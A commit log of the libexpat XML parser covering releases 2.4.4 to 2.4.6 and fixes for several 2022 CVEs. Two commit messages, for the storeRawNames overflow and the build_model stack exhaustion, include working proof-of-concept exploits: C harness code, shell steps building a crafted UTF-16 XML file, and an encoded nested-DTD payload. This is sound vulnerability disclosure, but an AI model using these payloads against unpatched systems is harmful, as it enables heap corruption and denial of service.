summaryrefslogtreecommitdiff
Commit message (Collapse)AuthorAgeFilesLines
* Changes: Document loop replacementdeloopSebastian Pipping2022-02-201-0/+4
|
* lib: Leverage strcmp/wcscmpSebastian Pipping2022-02-201-0/+8
|
* lib: Leverage memcpy (and xcslen)Sebastian Pipping2022-02-201-6/+3
|
* lib: Leverage poolAppendChars (and xcslen)Sebastian Pipping2022-02-201-79/+55
|
* lib/xmlwf: Leverage xcslenSebastian Pipping2022-02-203-38/+27
|
* lib: Add a multi-char version of poolAppendChar based on memcpySebastian Pipping2022-02-201-0/+19
|
* lib: Add string length function xcslen for static re-useSebastian Pipping2022-02-203-0/+50
|
* lib: Leverage (existing single-char) poolAppendCharSebastian Pipping2022-02-201-4/+2
|
* Merge pull request #568 from libexpat/issue-567-prepare-releaseR_2_4_6Sebastian Pipping2022-02-2011-18/+22
|\ | | | | Prepare release 2.4.6 (part of #567)
| * Set expected release date for 2.4.6Sebastian Pipping2022-02-202-2/+2
| |
| * Bump version to 2.4.6Sebastian Pipping2022-02-208-13/+13
| |
| * Bump version info from 9:5:8 to 9:6:8Sebastian Pipping2022-02-203-2/+6
| | | | | | | | See https://verbump.de/ for what these numbers do
| * Changes: Finalize entry on #566Sebastian Pipping2022-02-201-1/+1
|/
* Merge pull request #566 from ferivoz/model-regressionSebastian Pipping2022-02-203-32/+140
|\ | | | | Fix build_model regression
| * Changes: Document regression from CVE-2022-25313 fixSebastian Pipping2022-02-201-0/+16
| |
| * tests: Protect against nested element declaration model regressionsSebastian Pipping2022-02-201-0/+77
| |
| * Fix build_model regression.Samanta Navarro2022-02-201-32/+47
|/ | | | | | | | | | | | | | | | | The iterative approach in build_model failed to fill children arrays correctly. A preorder traversal is not required and turned out to be the culprit. Use an easier algorithm: Add nodes from scaffold tree starting at index 0 (root) to the target array whenever children are encountered. This ensures that children are adjacent to each other. This complies with the recursive version. Store only the scaffold index in numchildren field to prevent a direct processing of these children, which would require a recursive solution. This allows the algorithm to iterate through the target array from start to end without jumping back and forth, converting on the fly. Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
* Merge pull request #564 from libexpat/issue-557-prepare-releaseR_2_4_5Sebastian Pipping2022-02-1814-20/+40
|\ | | | | Prepare release 2.4.5 (part of #557)
| * Set expected release date for 2.4.5Sebastian Pipping2022-02-182-2/+2
| |
| * Sync file headersSebastian Pipping2022-02-183-3/+3
| |
| * Bump version to 2.4.5Sebastian Pipping2022-02-188-13/+13
| |
| * Bump version info from 9:4:8 to 9:5:8Sebastian Pipping2022-02-183-2/+6
| | | | | | | | See https://verbump.de/ for what these numbers do
| * Changes: Document #558 #559 #560Sebastian Pipping2022-02-181-0/+16
|/
* Merge pull request #562 from libexpat/utf8-securitySebastian Pipping2022-02-184-12/+127
|\ | | | | [CVE-2022-25235] lib: Protect against malformed encoding (e.g. malformed UTF-8)
| * Changes: Document CVE-2022-25235Sebastian Pipping2022-02-181-0/+7
| |
| * tests: Cover missing validation of encoding (CVE-2022-25235)Sebastian Pipping2022-02-181-0/+109
| |
| * lib: Add comments to BT_LEAD* cases where encoding has already been validatedSebastian Pipping2022-02-181-5/+5
| |
| * lib: Add missing validation of encoding (CVE-2022-25235)Sebastian Pipping2022-02-181-2/+6
| |
| * lib: Drop unused macro UTF8_GET_NAMINGSebastian Pipping2022-02-181-5/+0
|/
* Merge pull request #561 from libexpat/namesep-securitySebastian Pipping2022-02-183-4/+59
|\ | | | | [CVE-2022-25236] lib: Protect against insertion of namesep characters into namespace URIs
| * Changes: Document CVE-2022-25236Sebastian Pipping2022-02-161-0/+16
| |
| * tests: Cover CVE-2022-25236Sebastian Pipping2022-02-161-0/+30
| |
| * lib: Protect against malicious namespace declarations (CVE-2022-25236)Sebastian Pipping2022-02-161-0/+11
| |
| * lib: Fix (harmless) use of uninitialized memorySebastian Pipping2022-02-161-4/+2
| |
* | Merge pull request #560 from ferivoz/copySebastian Pipping2022-02-181-1/+1
|\ \ | | | | | | [CVE-2022-25314] lib: Prevent integer overflow in copyString
| * | Prevent integer overflow in copyStringSamanta Navarro2022-02-151-1/+1
| | | | | | | | | | | | | | | The copyString function is only used for encoding string supplied by the library user.
* | | Merge pull request #559 from ferivoz/rawnamesSebastian Pipping2022-02-181-1/+6
|\ \ \ | | | | | | | | [CVE-2022-25315] lib: Prevent integer overflow in storeRawNames
| * | | Prevent integer overflow in storeRawNamesSamanta Navarro2022-02-151-1/+6
| |/ / | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | It is possible to use an integer overflow in storeRawNames for out of boundary heap writes. Default configuration is affected. If compiled with XML_UNICODE then the attack does not work. Compiling with -fsanitize=address confirms the following proof of concept. The problem can be exploited by abusing the m_buffer expansion logic. Even though the initial size of m_buffer is a power of two, eventually it can end up a little bit lower, thus allowing allocations very close to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag names can be parsed which are almost INT_MAX in size. Unfortunately (from an attacker point of view) INT_MAX/2 is also a limitation in string pools. Having a tag name of INT_MAX/2 characters or more is not possible. Expat can convert between different encodings. UTF-16 documents which contain only ASCII representable characters are twice as large as their ASCII encoded counter-parts. The proof of concept works by taking these three considerations into account: 1. Move the m_buffer size slightly below a power of two by having a short root node <a>. This allows the m_buffer to grow very close to INT_MAX. 2. The string pooling forbids tag names longer than or equal to INT_MAX/2, so keep the attack tag name smaller than that. 3. To be able to still overflow INT_MAX even though the name is limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag which only contains ASCII characters. UTF-16 always stores two bytes per character while the tag name is converted to using only one. Our attack node byte count must be a bit higher than 2/3 INT_MAX so the converted tag name is around INT_MAX/3 which in sum can overflow INT_MAX. Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes without running into INT_MAX boundary check. The string pooling is able to store INT_MAX/3 as tag name because the amount is below INT_MAX/2 limitation. And creating the sum of both eventually overflows in storeRawNames. Proof of Concept: 1. Compile expat with -fsanitize=address. 2. Create Proof of Concept binary which iterates through input file 16 MB at once for better performance and easier integer calculations: ``` cat > poc.c << EOF #include <err.h> #include <expat.h> #include <stdlib.h> #include <stdio.h> #define CHUNK (16 * 1024 * 1024) int main(int argc, char *argv[]) { XML_Parser parser; FILE *fp; char *buf; int i; if (argc != 2) errx(1, "usage: poc file.xml"); if ((parser = XML_ParserCreate(NULL)) == NULL) errx(1, "failed to create expat parser"); if ((fp = fopen(argv[1], "r")) == NULL) { XML_ParserFree(parser); err(1, "failed to open file"); } if ((buf = malloc(CHUNK)) == NULL) { fclose(fp); XML_ParserFree(parser); err(1, "failed to allocate buffer"); } i = 0; while (fread(buf, CHUNK, 1, fp) == 1) { printf("iteration %d: XML_Parse returns %d\n", ++i, XML_Parse(parser, buf, CHUNK, XML_FALSE)); } free(buf); fclose(fp); XML_ParserFree(parser); return 0; } EOF gcc -fsanitize=address -lexpat -o poc poc.c ``` 3. Construct specially prepared UTF-16 XML file: ``` dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368 iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml ``` 4. Run proof of concept: ``` ./poc poc-utf16.xml ```
* | | Merge pull request #558 from ferivoz/modelSebastian Pipping2022-02-181-37/+79
|\ \ \ | |_|/ |/| | [CVE-2022-25313] lib: Prevent stack exhaustion in build_model
| * | Prevent stack exhaustion in build_modelSamanta Navarro2022-02-151-37/+79
| |/ | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | It is possible to trigger stack exhaustion in build_model function if depth of nested children in DTD element is large enough. This happens because build_node is a recursively called function within build_model. The code has been adjusted to run iteratively. It uses the already allocated heap space as temporary stack (growing from top to bottom). Output is identical to recursive version. No new fields in data structures were added, i.e. it keeps full API and ABI compatibility. Instead the numchildren variable is used to temporarily keep the index of items (uint vs int). Documentation and readability improvements kindly added by Sebastian. Proof of Concept: 1. Compile poc binary which parses XML file line by line ``` cat > poc.c << EOF #include <err.h> #include <expat.h> #include <stdio.h> XML_Parser parser; static void XMLCALL dummy_element_decl_handler(void *userData, const XML_Char *name, XML_Content *model) { XML_FreeContentModel(parser, model); } int main(int argc, char *argv[]) { FILE *fp; char *p = NULL; size_t s = 0; ssize_t l; if (argc != 2) errx(1, "usage: poc poc.xml"); if ((parser = XML_ParserCreate(NULL)) == NULL) errx(1, "XML_ParserCreate"); XML_SetElementDeclHandler(parser, dummy_element_decl_handler); if ((fp = fopen(argv[1], "r")) == NULL) err(1, "fopen"); while ((l = getline(&p, &s, fp)) > 0) if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK) errx(1, "XML_Parse"); XML_ParserFree(parser); free(p); fclose(fp); return 0; } EOF cc -std=c11 -D_POSIX_C_SOURCE=200809L -lexpat -o poc poc.c ``` 2. Create XML file with a lot of nested groups in DTD element ``` cat > poc.xml.zst.b64 << EOF KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ== EOF base64 -d poc.xml.zst.b64 | zstd -d > poc.xml ``` 3. Run Proof of Concept ``` ./poc poc.xml ``` Co-authored-by: Sebastian Pipping <sebastian@pipping.org>
* | Merge pull request #563 from libexpat/extend-mailmapSebastian Pipping2022-02-1510-9/+10
|\ \ | |/ |/| Extend .mailmap
| * Sync file headersSebastian Pipping2022-02-159-9/+9
| |
| * Extend .mailmapSebastian Pipping2022-02-151-0/+1
|/
* Merge pull request #554 from libexpat/issue-552-prepare-releaseR_2_4_4Sebastian Pipping2022-01-3016-22/+36
|\ | | | | Prepare release 2.4.4 (part of #552)
| * win32: Add missing files to the installerSebastian Pipping2022-01-292-0/+7
| |
| * doc: Drop unused file valid-xhtml10.pngSebastian Pipping2022-01-293-2/+0
| | | | | | | | Unused since commit 30c4aa85f530f279d8c9cc2f584fa9a9df7e2bf1 of 2.4.0
| * .gitignore: Add missingSebastian Pipping2022-01-292-0/+2
| |
| * xmlwf.xml: Adapt note to current practiceSebastian Pipping2022-01-291-1/+1
| |
| * Set expected release date for 2.4.4Sebastian Pipping2022-01-292-2/+2
| |
| * Sync file headersSebastian Pipping2022-01-293-2/+3
| |